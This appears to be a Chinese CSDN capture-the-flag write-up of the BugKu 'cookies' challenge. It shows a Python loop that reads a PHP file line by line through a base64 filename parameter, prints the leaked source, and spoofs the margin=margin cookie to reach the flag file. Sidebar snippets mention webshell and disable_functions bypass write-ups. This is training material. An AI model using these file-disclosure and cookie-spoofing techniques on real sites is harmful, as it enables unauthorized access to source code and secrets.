BugKu_cookies

最新推荐文章于 2024-03-12 22:42:04 发布
最新推荐文章于 2024-03-12 22:42:04 发布
阅读量396 收藏 1
点赞数 3
分类专栏: CTF 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44959263/article/details/119563067
版权

在这里插入图片描述
访问目标地址,发现了一串不知道在表达什么的字符串

在这里插入图片描述
看到url最后是一个base64加密了的字符串“a2V5cy50eHQ=”,尝试解码

在这里插入图片描述
尝试用 filename访问index.php(原url使用base64,这也将index.php进行编码),line参数应该是行数,试一下 line=2

在这里插入图片描述
在这里插入图片描述
那么尝试把line改成3看看会发生什么呢

在这里插入图片描述
到这里可以猜测,每改一次行数就会显示一行源码!

我们尝试把line改成20的时候,发现是个空白页,不断减少范围,发现共有18行源代码!

构造脚本!

在这里插入图片描述
代码如下:

import requests

a=19

for i in range(a):
    url = "http://114.67.246.176:16040/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
    s = requests.get(url)
    print(s.text)

成功得到了全部源码!

<?php

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);

 

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}

 

if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

?>

根据源码的意思,需要cookie满足margin=margin才能访问,继续指向keys.php

在这里插入图片描述

发现是个空白页,我们右键查看源码,成功得到flag!

在这里插入图片描述

Kobalos Baku
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku_Web_Cookies
m0_46684679的博客
09-09 131
Bugku_Web_Cookies 日常训练 题目:https://ctf.bugku.com/challenges/detail/id/87.html 一道题目开始,把能用的、可疑的都记一记 提示cookies欺骗,但现在无cookie 参数line为空,参数filename的值为base64编码,且为GET传输 网页上文本内容(应该没关系) 思路:寻找cookie,请求访问index.php页面,向有flag的页面提交正确参数和cookie a2V5cy50eHQ= 解码为keys.txt
bugku_cookies欺骗_writeup
wuduan675068994的博客
07-12 334
import requests url='http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy5waHA=' headers={ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1"...
bugku-cookies
m0_62094846的博客
10-27 1002
一串代码,试过各种解码方式,都没用 这串代码有点像base64,解码得到keys.txt,但代替代码后页面没有信息 那么这串代码可能是某种固定格式,尝试使用其他文件名代替,flag.php,index.php的base64代码依次尝试 但都没获得有用的信息 这时注意到有个line,查找一下 line表示当前文件的行数,后面什么数字都没有,显然无法出现文件 ...
BugKucookies 欺骗
qq_39368007的博客
06-09 1439
查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处index.php要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50,25,20都无回显,大约定在30 import...
bugku web cookies欺骗
weixin_43928140的博客
05-20 723
记录菜鸡生活的第十二天 首先打开题目时一串字符串了 开始没啥想法,但是注意到了后面的url然后拿去解密,发现是keys.txt,放上去试一下 发现没有内容了,然后再思考一下,看这个url里面?后面有两个参数,一个line一个filename,然后filename后面是用的base64编码格式,就感觉filename传递的就是 base64密文格式,然后u传给后台的base64.decode()...
BUGKU-WEB cookies
最新发布
天泽岁月
03-12 1193
BUGKU-WEB cookie欺骗
Bugku_web_从零开始(二)
weixin_43727482的博客
02-04 1652
018 速度要快 打开网页,查看源码 提示使用post方法传一个margin过去,但不知道应该传什么;使用burpsuite抓包看看,在repeater里看到了flag,是一个base64编码,解码后尝试提交,提示不正确,又重新抓了几次包,发现包头的flag是不断变化的,发觉flag可能是需要传入的margin的值,要快速传值,使用python脚本:` import requests impor...
bugku cookies
weixin_63810302的博客
09-29 1032
bugku cookies
BUGKU_(本地包含+成绩单)
qq_44832048的博客
10-27 193
本地包含 在网页中新建标签页打开链接后出现以下一些PHP代码, include “flag.php” 包含flag。。。 下面解析这段代码: request这个变量和_request这个变量和r​equest这个变量和_GET、$_POST一样,都属于超级全局变量,运行时修改后者不会影响前者,修改后者不会影响前者。在这里可以以get/post/cookies等方式把以hello为名的东西提交过来 ...
Cookies.rar_cookies_cookies.rar_delphi cooki_delphi cooki_浏览器
07-14
在IT领域,尤其是在Web开发和编程中,"Cookies"是一个重要的概念。Cookies是服务器发送到用户浏览器并存储在本地的一小段数据,用于跟踪和维护用户的会话信息、个性化设置等。本压缩包"Cookies.rar"包含了一个用...
LsCommDemo_cookies3ck_Vc_
09-30
《LsCommDemo:基于Vc的串行通信接口实现》 在计算机编程领域,串行通信是一种常用的数据传输方式,特别是在嵌入式系统、工业自动化以及设备间通信中。本文将详细介绍一个名为"LsCommDemo"的项目,该项目是用C++...
Test_dl.rar_cookie_cookie java_cookies_java cookie
09-24
标题中的“Test_dl.rar_cookie_cookie java_cookies_java cookie”暗示了一个关于Java编程中处理Cookie的教程或项目,可能涉及网络登录验证。描述进一步说明了这个压缩包包含的信息,它提到了如何利用Cookie进行自动...
JSP.rar_cookies jsp_jsp_jsp cooki_jsp cookies_jsp 用户管理
09-24
标题中的“JSP.rar_cookies jsp_jsp_jsp cooki_jsp cookies_jsp 用户管理”表明这个压缩包可能包含了一系列关于使用JSP(JavaServer Pages)处理Cookie的教程或示例代码,主要用于用户管理。描述中提到“cookies的...
mob.zip_GSM_cookies1eh_gsm matlab_gsm simulink_zip
07-14
标题中的“mob.zip_GSM_cookies1eh_gsm matlab_gsm simulink_zip”表明这是一个与GSM(全球系统移动通信)相关的MATLAB项目,其中可能包含了使用Simulink进行建模和仿真的工作。GSM是一种广泛使用的蜂窝移动通信标准...
file_include-data
Kobalos的博客
12-02 3030
<?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){ //如果file参数中存在这么多元素就显示errer die("error"); } include($file); }else{ highlight_file(_
ctf.show_web4
Kobalos的博客
12-15 2704
查看题目 发现题目要求get请求传输一个url参数,并且看到了include,估计需要使用伪协议进行包含,进行尝试 http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=php://input 发现报错error,继续尝试其他协议发现都显示error 尝试直接在后面加文件 http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=/etc/pa
BugKu_getshell
Kobalos的博客
09-07 2382
访问目标地址 看到是php的代码,格式应该是经过混淆加密的 推荐一个节省时间的网站: https://www.zhaoyuanma.com/phpjm.html 解出来发现是一个木马,试着用蚁剑连接一下,成功! 但是执行命令的时候显示red=127,猜测应该是有disable_functions对执行命令的函数进行限制,查看phpinfo确认一下 果然禁止的差不多了,试着用蚁剑插件市场下载的绕过工具进行绕过! 看到插件中显示的绕过需要的条件都满足了,直接点击开始,他会在当前目录下传文件 使用蚁.
BugKu_eval
Kobalos的博客
08-03 1608
访问目标地址,发现一段php代码 首先做一个简单的分析 <?php include "flag.php"; ///include是将flag.php文件包含进页面代码,顺便提示了flag位置 $a = @$_REQUEST['hello']; ///$_REQUEST可以用于接受get和post传递的参数 eval( "var_dump($a);"); ///eval函数可以把字符串当作php命令执行 show_source(__FILE__); ?&g.
selenium get_cookies
08-12
通过selenium的get_cookies()方法,可以获取当前页面的所有cookie。示例代码如下: ```python from selenium import webdriver url = 'http://www.baidu.com' driver = webdriver.Chrome() driver.get(url) cookies = driver.get_cookies() print(cookies) ``` 这段代码可以打开百度网站,并获取当前页面的所有cookie,并打印输出。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [爬虫之selenium对cookie的处理](https://blog.csdn.net/weixin_44799217/article/details/112970954)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [利用selenium携带cookies实现免登录](https://blog.csdn.net/weixin_43821172/article/details/105199481)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值